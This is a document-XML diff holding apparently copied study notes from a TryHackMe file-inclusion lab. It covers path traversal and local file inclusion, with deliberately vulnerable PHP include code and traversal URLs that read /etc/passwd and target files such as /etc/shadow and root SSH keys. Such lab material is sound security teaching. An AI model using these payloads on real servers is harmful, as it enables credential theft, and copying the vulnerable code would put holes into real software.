+        <w:t>Similarly, if the web application runs on a Windows server, the attacker needs to provide Windows paths. For example, if the attacker wants to read the boot.ini file located in c:\boot.ini, then the attacker can try the following depending on the target OS version:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>http://webapp.thm/get.php?file=../../../../boot.ini or</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>http://webapp.thm/get.php?file=../../../../windows/win.ini</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">The same concept applies here as with Linux operating systems, where we climb up directories until it reaches the root directory, which is </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>usually .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sometimes, developers will add filters to limit access to only certain files or directories. Below are some common OS files you could use when testing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="12930" w:type="dxa"/>
+        <w:tblCellMar>
+          <w:left w:w="0" w:type="dxa"/>
+          <w:right w:w="0" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2859"/>
+        <w:gridCol w:w="10071"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Location</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Description</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>etc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/issue</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>contains a message or system identification to be printed before the login prompt.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>etc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/profile</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>controls system-wide default variables, such as Export variables, File creation mask (</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>umask</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>), Terminal types, Mail messages to indicate when new mail has arrived</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/proc/version</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>specifies the version of the Linux kernel</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>etc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/passwd</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>has all registered users that have access to a system</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>etc</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/shadow</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>contains information about the system's users' passwords</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>/root/.</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>bash_history</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>contains the history commands for root user</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/var/log/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>dmessage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>contains global system messages, including the messages that are logged during system startup</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/var/mail/root</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>all emails for root user</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/root/.ssh/</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>id_rsa</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Private SSH keys for a root or any known valid user on the server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>/var/log/apache2/access.log</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>the accessed requests for Apache web server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:bottom w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>C:\boot.ini</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:tcBorders>
+              <w:bottom w:val="nil"/>
+              <w:right w:val="nil"/>
+            </w:tcBorders>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>contains the boot options for computers with BIOS firmware</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve">d-Local File Inclusion </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LFI</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Local File Inclusion (LFI)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>LFI attacks against web applications are often due to a developers' lack of security awareness. With PHP, using functions such as include, require, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>include_once</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>require_once</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> often contribute to vulnerable web applications. In this room, we'll be picking on PHP, but it's worth noting LFI vulnerabilities also occur when using other languages such as ASP, JSP, or even in Node.js apps. LFI exploits follow the same concepts as path traversal.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In this section, we will walk you through various LFI scenarios and how to exploit them.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>#1.</w:t>
+      </w:r>
+      <w:r>
+        <w:t> Suppose the web application provides two languages, and the user can select between the EN and AR</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;?PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t>include($_GET["lang"]);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The PHP code above uses a GET request via the URL parameter lang to include the file of the page. The call can be done by sending the following HTTP request as follows: http://webapp.thm/index.php?lang=EN.php to load the English page or http://webapp.thm/index.php?lang=AR.php to load the Arabic page, where </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>EN.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AR.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t> files exist in the same directory.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Theoretically, we can access and display any readable file on the server from the code above if there isn't any input validation. Let's say we want to read the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd file, which contains sensitive information about the users of the Linux operating system, we can try the following: http://webapp.thm/get.php?file=/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>In this case, it works because there isn't a directory specified in the include function and no input validation.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Now apply what we discussed and try to read /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>/passwd file. Also, answer question #1 below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>#2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t> Next, In the following code, the developer decided to specify the directory inside the function.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>&lt;?PHP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>include(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"languages/". $_GET['lang']); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In the above code, the developer decided to use the include function to call PHP pages in the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>languages</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t> directory only via lang parameters.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>If there is no input validation, the attacker can manipulate the URL by replacing the lang input with other OS-sensitive files such as /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/passwd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Again</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the payload looks similar to the path traversal, but </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> include function allows us to include any called files into the current page. The following will be the exploit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>http://webapp.thm/index.php?lang</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>=../../../..</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Now apply what we discussed, try to read files within the server, and figure out the directory specified in the include function and answer question #2 below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>e-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Local File Inclusion - LFI Continued</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:hyperlink r:id="rId75" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:highlight w:val="magenta"/>
+          </w:rPr>
+          <w:t>https://rahulk2903.medium.com/file-inclusion-tryhackme-walkthrough-99288e6dd348</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In this task, we go a little bit deeper into LFI. We discussed a couple of techniques to bypass the filter within the include function.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>#3.</w:t>
+      </w:r>
+      <w:r>
+        <w:t> In the first two cases, we checked the code for the web app, and then we knew how to exploit it. However, in this case, we are performing black box testing, in which we don't have the source code. In this case, errors are significant in understanding how the data is passed and processed into the web app.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>In this scenario, we have the following entry point: http://webapp.thm/index.php?lang=EN. If we enter an invalid input, such as THM, we get the following error</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Warning: include(languages/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>THM.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>): failed to open stream: No such file or directory in /var/www/html/THM-4/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>index.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> on line 12</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">The error message discloses significant information. By entering THM as input, an error message shows what </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
